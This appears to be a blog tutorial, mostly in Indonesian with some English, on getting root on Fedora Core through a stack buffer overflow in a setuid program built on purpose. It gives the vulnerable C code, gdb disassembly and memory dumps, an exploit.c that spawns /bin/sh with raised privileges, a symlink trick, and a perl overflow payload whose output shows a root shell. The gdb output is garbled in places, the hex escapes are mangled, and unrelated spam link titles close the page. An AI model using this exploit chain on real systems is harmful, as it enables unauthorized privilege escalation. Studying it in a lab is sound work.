On 12.04.11, In Local hacking techniques on Fedore core root two.
Let’s create a simple C language program to test vulnerability
[dokter@localhost fedora]$ cat vul.c
int main(int argc, char *argv[])
{
char buffer[256];
strcpy(buffer,argv[1]);
return 0;
}
sekarang mari kita kompilasi
[dokter@localhost fedora]$ gcc -o vul vul.c
dan sekarang mari kita buat sesuatu untuk sebuah test yang sempurna
[dokter@localhost fedora]$ su
Password:
[root@localhost fedora]# chgrp root vul
[root@localhost fedora]# chown root vul
[root@localhost fedora]# chmod 4755 vul
[root@localhost fedora]# ls -l vul
-rwsr-xr-x 1 root root 4733 11?12 23:11 vul
[root@localhost fedora]# su dokter
[dokter@localhost fedora]$
nah sekarang kamu siap menyerang program vulnerability….
dan langkah pertama yang harus kamu jalanin adalah mencari alamat dari
dengan menggunakan GDB
gdb apaan tuh ? pasti kamu bertanya…. jawaban nya … use your imajination
hehehehehe
[dokter@localhost fedora]$ gdb vul
40
GNU gdb Red Hat Linux (6.0post-0.20040223.19rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type “show copying” to see the conditions.
There is absolutely no warranty for GDB. Type “show warranty” for details.
This GDB was configured as “i386-redhat-linux-gnu”…(no debugging symbols found)…Using
host libthread_db library “/lib/tls/libthread_db.so.1″.
(gdb) b main
Breakpoint 1 at 0×8048379
(gdb) r
Starting program: /home/dokter/fedora/vul
Error while mapping shared library sections:
: ?
깃났.
Error while reading shared library symbols:
: 洹몃?漿佾 應좏좊━媛 壹.
(no debugging symbols found)…(no debugging symbols found)…Error while reading shared
library symbols:
: 洹몃?漿佾 應좏좊━媛 壹.
Error while reading shared library symbols:
: 洹몃?漿佾 應좏좊━媛 壹.
Breakpoint 1, 0×08048379 in main ()
(gdb) disas execl
Dump of assembler code for function execl:
0×005fea00 : push %ebp
0×005fea01 : mov %esp,%ebp
0×005fea03 : lea 0×10(%ebp),%eax
0×005fea06 : push %edi
0×005fea07 : push %esi
0×005fea08 : push %ebx
0×005fea09 : sub $0×1030,%esp
0×005fea0f : mov 0xc(%ebp),%ecx
0×005fea12 : movl $0×400,0xfffffff0(%ebp)
0×005fea19 : lea 0×1b(%esp),%esi
0×005fea1d : and $0xfffffff0,%esi
0×005fea20 : call 0×58c90d <__i686.get_pc_thunk.bx>
0×005fea25 : add $0×905d7,%ebx
0×005fea2b : mov %ecx,(%esi)
0×005fea2d : test %ecx,%ecx
0×005fea2f : mov %eax,0xffffffe8(%ebp)
0×005fea32 : movl $0×1,0xffffffec(%ebp)
0×005fea39 : je 0×5fea73
0×005fea3b : movl $0×1a,0xffffffe0(%ebp)
0×005fea42 : lea 0×0(%esi),%esi
0×005fea49 : lea 0×0(%edi),%edi
0×005fea50 : mov 0xfffffff0(%ebp),%edx
0×005fea53 : cmp %edx,0xffffffec(%ebp)
0×005fea56 : je 0×5fea96
0×005fea58 : addl $0×8,0xffffffe0(%ebp)
0×005fea5c : mov 0xffffffe8(%ebp),%edx
0×005fea5f : mov 0xffffffec(%ebp),%edi
0×005fea62 : addl $0×4,0xffffffe8(%ebp)
0×005fea66 : mov (%edx),%ecx
0×005fea68 : mov %ecx,(%esi,%edi,4)
0×005fea6b : inc %edi
0×005fea6c : test %ecx,%ecx
0×005fea6e : mov %edi,0xffffffec(%ebp)
0×005fea71 : jne 0×5fea50
0×005fea73 : mov 0xfffffee0(%ebx),%edi
0×005fea79 : mov (%edi),%ecx
0×005fea7b : mov %esi,0×4(%esp)
0×005fea7f : mov 0×8(%ebp),%esi
0×005fea82 : mov %ecx,0×8(%esp)
0×005fea86 : mov %esi,(%esp)
0×005fea89 : call 0×5fe7a0
0×005fea8e : lea 0xfffffff4(%ebp),%esp
0×005fea91 : pop %ebx
0×005fea92 : pop %esi
41
0×005fea93 : pop %edi
0×005fea94 : pop %ebp
0×005fea95 : ret
0×005fea96 : mov 0xffffffec(%ebp),%edx
0×005fea99 : mov 0xffffffe0(%ebp),%ecx
0×005fea9c : add %edx,%edx
0×005fea9e : mov %edx,0xffffffe4(%ebp)
0×005feaa1 : and $0xfffffffc,%ecx
0×005feaa4 : sub %ecx,%esp
0×005feaa6 : mov %edx,0xfffffff0(%ebp)
0×005feaa9 : mov 0xffffffe4(%ebp),%eax
0×005feaac : lea 0×1b(%esp),%edx
0×005feab0 : and $0xfffffff0,%edx
0×005feab3 : lea (%eax,%edx,1),%edi
0×005feab6 : cmp %esi,%edi
0×005feab8 : je 0×5feacc
0×005feaba : cld
0×005feabb : mov 0xffffffec(%ebp),%ecx
0×005feabe : mov %edx,%edi
0×005feac0 : shl $0×2,%ecx
0×005feac3 : shr $0×2,%ecx
0×005feac6 : repz movsl %ds:(%esi),%es:(%edi)
0×005feac8 : mov %edx,%esi
0×005feaca : jmp 0×5fea58
0×005feacc : cld
0×005feacd : mov 0xffffffec(%ebp),%ecx
0×005fead0 : mov %edx,%edi
0×005fead2 : shl $0×2,%ecx
0×005fead5 : shr $0×2,%ecx
0×005fead8 : repz movsl %ds:(%esi),%es:(%edi)
0×005feada : mov %edx,%esi
0×005feadc : mov 0xffffffe4(%ebp),%edi
0×005feadf : mov 0xffffffec(%ebp),%eax
0×005feae2 : add %eax,%edi
0×005feae4 : mov %edi,0xfffffff0(%ebp)
0×005feae7 : jmp 0×5fea58
0×005feaec : nop
0×005feaed : nop
0×005feaee : nop
0×005feaef : nop
End of assembler dump.
(gdb) q
The program is running. Exit anyway? (y or n) y
keep moving lolz
[vangelis @ testbed fedora] $
The reason why we do not have the address of or karna
value of% ebp may be changed if “push% ebp” or “mov% esp,% ebp”
in execution. We found the address of very easy to
using gdb: 0×005fea03.
[dokter@localhost fedora]$ gdb -q vul
(no debugging symbols found)…Using host libthread_db library
“/lib/tls/libthread_db.so.1″.
(gdb) b main
Breakpoint 1 at 0×8048379
(gdb) r
Starting program: /home/dokter/fedora/vul
Error while mapping shared library sections:
: ?
깃났.
Error while reading shared library symbols:
: 洹몃?漿佾 應좏좊━媛 壹.
(no debugging symbols found)…(no debugging symbols found)…Error while reading shared
library symbols:
: 洹몃?漿佾 應좏좊━媛 壹.
Error while reading shared library symbols:
: 洹몃?漿佾 應좏좊━媛 壹.
Breakpoint 1, 0×08048379 in main ()
(gdb) x/50x 0×8049000
0×8049000: 0×464c457f 0×00010101 0×00000000 0×00000000
0×8049010: 0×00030002 0×00000001 0×080482c0 0×00000034
0×8049020: 0×00000788 0×00000000 0×00200034 0×00280007
0×8049030: 0×0019001c 0×00000006 0×00000034 0×08048034
0×8049040: 0×08048034 0×000000e0 0×000000e0 0×00000005
0×8049050: 0×00000004 0×00000003 0×00000114 0×08048114
0×8049060: 0×08048114 0×00000013 0×00000013 0×00000004
0×8049070: 0×00000001 0×00000001 0×00000000 0×08048000
0×8049080: 0×08048000 0×0000047c 0×0000047c 0×00000005
0×8049090: 0×00001000 0×00000001 0×0000047c 0×0804947c
0×80490a0: 0×0804947c 0×00000100 0×00000104 0×00000006
0×80490b0: 0×00001000 0×00000002 0×00000490 0×08049490
0×80490c0: 0×08049490 0×000000c8
(gdb)
0×80490c8: 0×000000c8 0×00000006 0×00000004 0×00000004
0×80490d8: 0×00000128 0×08048128 0×08048128 0×00000020
0×80490e8: 0×00000020 0×00000004 0×00000004 0×6474e551
0×80490f8: 0×00000000 0×00000000 0×00000000 0×00000000
0×8049108: 0×00000000 0×00000006 0×00000004 0×62696c2f
0×8049118: 0×2d646c2f 0×756e696c 0×6f732e78 0×0000322e
0×8049128: 0×00000004 0×00000010 0×00000001 0×00554e47
0×8049138: 0×00000000 0×00000002 0×00000002 0×00000005
0×8049148: 0×00000003 0×00000006 0×00000004 0×00000001
0×8049158: 0×00000005 0×00000000 0×00000000 0×00000000
0×8049168: 0×00000000 0×00000003 0×00000002 0×00000000
0×8049178: 0×00000000 0×00000000 0×00000000 0×00000044
0×8049188: 0×00000000 0×000000ef
(gdb)
0×8049190: 0×00000012 0×00000035 0×08048474 0×00000004
0×80491a0: 0×000e0011 0×00000001 0×00000000 0×00000000
0×80491b0: 0×00000020 0×00000015 0×00000000 0×00000000
0×80491c0: 0×00000020 0×0000002e 0×00000000 0×00000030
0×80491d0: 0×00000012 0×764a5f00 0×6765525f 0×65747369
0×80491e0: 0×616c4372 0×73657373 0×675f5f00 0×5f6e6f6d
0×80491f0: 0×72617473 0×005f5f74 0×6362696c 0×2e6f732e
0×8049200: 0×74730036 0×79706372 0×4f495f00 0×6474735f
0×8049210: 0×755f6e69 0×00646573 0×696c5f5f 0×735f6362
0×8049220: 0×74726174 0×69616d5f 0×4c47006e 0×5f434249
0×8049230: 0×00302e32 0×00020000 0×00000001 0×00020000
0×8049240: 0×00010001 0×00000024 0×00000010 0×00000000
0×8049250: 0×0d696910 0×00020000
(gdb)
0×8049258: 0×00000056 0×00000000 0×08049558 0×00000406
43
0×8049268: 0×08049568 0×00000107 0×0804956c 0×00000507
0×8049278: 0×83e58955 0×61e808ec 0xe8000000 0×000000bc
0×8049288: 0×0001a3e8 0×00c3c900 0×956035ff 0×25ff0804
0×8049298: 0×08049564 0×00000000 0×956825ff 0×00680804
0×80492a8: 0xe9000000 0xffffffe0 0×956c25ff 0×08680804
0×80492b8: 0xe9000000 0xffffffd0 0×895eed31 0xf0e483e1
0×80492c8: 0×68525450 0×080483ec 0×0483a468 0×68565108
0×80492d8: 0×08048370 0xffffbfe8 0×9090f4ff 0×53e58955
0×80492e8: 0×000000e8 0xc3815b00 0×0000126f 0xfc838b50
0×80492f8: 0×85ffffff 0xff0274c0 0xfc5d8bd0 0×9090c3c9
0×8049308: 0×83e58955 0×3d8008ec 0×0804957c 0xa1297500
0×8049318: 0×08049578 0xd285108b
(gdb)
0×8049320: 0xf6891774 0xa304c083 0×08049578 0×78a1d2ff
0×8049330: 0×8b080495 0×75d28510 0×7c05c6eb 0×01080495
0×8049340: 0xf689c3c9 0×83e58955 0×8ca108ec 0×85080494
0×8049350: 0xb81974c0 0×00000000 0×1074c085 0×680cec83
0×8049360: 0×0804948c 0xc483d0ff 0×00768d10 0×9090c3c9
0×8049370: 0×81e58955 0×000108ec 0xf0e48300 0×000000b8
0×8049380: 0×83c42900 0×458b08ec 0×04c0830c 0×858d30ff
0×8049390: 0xfffffef8 0xff16e850 0xc483ffff 0×0000b810
0×80493a0: 0xc3c90000 0×57e58955 0xec835356 0×0000e80c
0×80493b0: 0×815b0000 0×0011aac3 0xfebae800 0×938dffff
0×80493c0: 0xffffff20 0xff208b8d 0xca29ffff 0xfac1f631
0×80493d0: 0×73d63902 0×90d7890f 0×20b394ff 0×46ffffff
0×80493e0: 0xf472fe39 0×5b0cc483
(gdb)
0×80493e8: 0xc3c95f5e 0×56e58955 0×0000e853 0×815b0000
0×80493f8: 0×001166c3 0×208b8d00 0×8dffffff 0xffff2083
0×8049408: 0xc1c129ff 0xc98502f9 0×75ff718d 0×003ae80b
0×8049418: 0×5e5b0000 0xf689c3c9 0×20b394ff 0×89ffffff
0×8049428: 0xd2854ef2 0xe5ebf275 0×53e58955 0×947ca152
0×8049438: 0xf8830804 0×947cbbff 0×0c740804 0xff04eb83
0×8049448: 0×83038bd0 0xf475fff8 0xc3c95b58 0×53e58955
0×8049458: 0×000000e8 0xc3815b00 0×000010ff 0xfe9ee852
0×8049468: 0×5d8bffff 0×00c3c9fc 0×00000003 0×00020001
0×8049478: 0×00000000 0xffffffff 0×00000000 0xffffffff
0×8049488 <__DTOR_END__>: 0×00000000 0×00000000 0×00000001
0×00000024
0×8049498 <_DYNAMIC+8>: 0×0000000c 0×08048278 0×0000000d 0×08048454
0×80494a8 <_DYNAMIC+24>: 0×00000004 0×08048148
(gdb)
0×80494b0 <_DYNAMIC+32>: 0×00000005 0×080481d4 0×00000006
0×08048174
0×80494c0 <_DYNAMIC+48>: 0×0000000a 0×00000060 0×0000000b
0×00000010
0×80494d0 <_DYNAMIC+64>: 0×00000015 0×005714b8 0×00000003
0×0804955c
0×80494e0 <_DYNAMIC+80>: 0×00000002 0×00000010 0×00000014
0×00000011
0×80494f0 <_DYNAMIC+96>: 0×00000017 0×08048268 0×00000011
0×08048260
0×8049500 <_DYNAMIC+112>: 0×00000012 0×00000008 0×00000013
0×00000008
0×8049510 <_DYNAMIC+128>: 0×6ffffffe 0×08048240 0×6fffffff
0×00000001
0×8049520 <_DYNAMIC+144>: 0×6ffffff0 0×08048234 0×00000000
0×00000000
0×8049530 <_DYNAMIC+160>: 0×00000000 0×00000000 0×00000000
0×00000000
0×8049540 <_DYNAMIC+176>: 0×00000000 0×00000000 0×00000000
0×00000000
0×8049550 <_DYNAMIC+192>: 0×00000000 0×00000000 0×00000000
0×08049490
0×8049560 <_GLOBAL_OFFSET_TABLE_+4>: 0×005714d0 0×00566830 0×0058c9f0
0×080482b6
0×8049570 : 0×00000000 0×00000000
(gdb) x/8x 0×8049564
0×8049564 <_GLOBAL_OFFSET_TABLE_+8>: 0×00566830 0×0058c9f0 0×080482b6
0×00000000
44
0×8049574 <__dso_handle>: 0×00000000 0×08049488 0×00000000
0×00000000
(gdb)
but do not worry because we find parts that can be used from
execl (). explanation is as follows:
execl (char * path, char * arg0, …, char * argn, 0);
the last argument of execl () must be null (aka empty)
so you can use the argument of the execl () it. This explanation is more
detail
<_GLOBAL_OFFSET_TABLE_+8> 0×8049564: 0×00566830 0×00000000 0×080482b6 0×0058c9f0
——————————
we will use the execl () as “execl (0×8049568, 0×804956c,
0×8049570) “. We must use the value of the address because the arguments
must be pointers.
This more detailed explanation
(gdb) x/8x 0×0058c9f0
0×58c9f0 <__libc_start_main>: 0×57e58955 0xec835356 0×0c458b4c 0xe810558b
—————————————
-
0×58ca00 <__libc_start_main+16>: 0xffffff09 0×25f8c381 0×7d8b0010 0×1c758b18
———- ———- –
(gdb) x/8x 0×080482b6
0×80482b6 <_init+62>: 0×00000868 0xffd0e900 0xed31ffff 0×83e1895e
0×80482c6 <_start+6>: 0×5450f0e4 0×83ec6852 0xa4680804 0×51080483
(gdb) q
The program is running. Exit anyway? (y or n) y
[dokter@localhost fedora]$
25 bytes’ data in 0×0058c9f0 is the file name when execl () on the call. so we
need to create a symbolic link with this data. now let us
make the exploit program.
This program should be able to make us become permissions (setuid (0)) of the program
vulnerability and give access to successfully attack the root when we are his
[dokter@localhost fedora]$ cat > exploit.c
#include
main()
{
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
execl(”/bin/sh”, “sh”, 0);
45
}
[dokter@localhost fedora]$ gcc -o exploit exploit.c
mari kita membuat symbolic link untuk exploit dengan nilai dari argument
pertama dari execl().
[dokter@localhost fedora]$ ln -s /home/dokter/fedora/exploit “`perl -e ‘print
“x55×89xe5×57x56×53x83xecx4cx8bx45×0cx8bx55×10″,
“xe8×09xffxffxffx81xc3xf8×25x10″‘`”
mari kita cek symboloic link nya apakah sukses.
[dokter@localhost fedora]$ ls -l
刺怨
24
lrwxrwxrwx 1 dokter dokter 29 11?12 11:28 U??WVS??L?E??U?????????%? ->
/home/dokter/fedora/exploit
-rwxrwxr-x 1 dokter dokter 5186 11?12 11:27 exploit
-rw-rw-r– 1 dokter dokter 101 11?12 11:27 exploit.c
-rwsr-xr-x 1 root root 4725 11?12 10:31 vul
-rw-rw-r– 1 dokter dokter 90 11?12 10:31 vul.c
[dokter@localhost fedora]$
mantap… hehehheheheheheh
kalian bisa lihat kan apa yang terjadi dari proses yang terjadi
lanjut………….
pake gdb untuk cari nilai dari alamat nya
[dokter@localhost fedora]$ gdb -q vul
(no debugging symbols found)…Using host libthread_db library
“/lib/tls/libthread_db.so.1″.
(gdb) disas main
Dump of assembler code for function main:
0×08048370 : push %ebp
0×08048371 : mov %esp,%ebp
0×08048373 : sub $0×108,%esp // 264 bytes are needed to overflow buffer
0×08048379 : and $0xfffffff0,%esp
0×0804837c : mov $0×0,%eax
0×08048381 : sub %eax,%esp
0×08048383 : sub $0×8,%esp
0×08048386 : mov 0xc(%ebp),%eax
0×08048389 : add $0×4,%eax
0×0804838c : pushl (%eax)
0×0804838e : lea 0xfffffef8(%ebp),%eax
0×08048394 : push %eax
0×08048395 : call 0×80482b0 <_init+56>
0×0804839a : add $0×10,%esp
0×0804839d : mov $0×0,%eax
0×080483a2 : leave
0×080483a3 : ret
End of assembler dump.
(gdb) q
[dokter@localhost fedora]$
Now we get all the data we need to attack …
see below that we have collected the data
+ ————————- + ———————– + ——— + —————
| Data to overflow buffer | * first argument of execl () – 8 | * + |
46
+ ————————- + ———————– + ——— + —————
^ ^ ^
| | |
264 bytes 0×8049568 – 8 = 0×8049560 0×5fea03
so the data we need it for the first argument of execl () – 8 in the execl ()
work when we call execve () internally, and execve () references from
ebp +8 when we take the pointer of the file name.
Let’s continue the attack last
[dokter@localhost fedora]$ ./vul `perl -e ‘print
“A”x264,”x60×95x04×08x03xeax5f”‘`
sh-2.05b# id
uid=0(root) gid=501(dokter) groups=501(dokter)
sh-2.05b# whoami
root
sh-2.05b#
================================================== ===================
WARNING!
I am not responsible for misuse of this article is only
as a mere science
so once again …
PLEASE DONT TRY THIS AT OTHER PEOPLE computers
TRY THIS WITH YOUR OWN RISK
follow the popular news :
Why Boys and Men Need to Differentiate?
Four Techniques Ejaculation Procrastinator
Knowledge About Things That are Strange and Fun That Makes People Happy
Verify Paypal with Payoneer Free
Local hacking techniques on Fedore core root 2
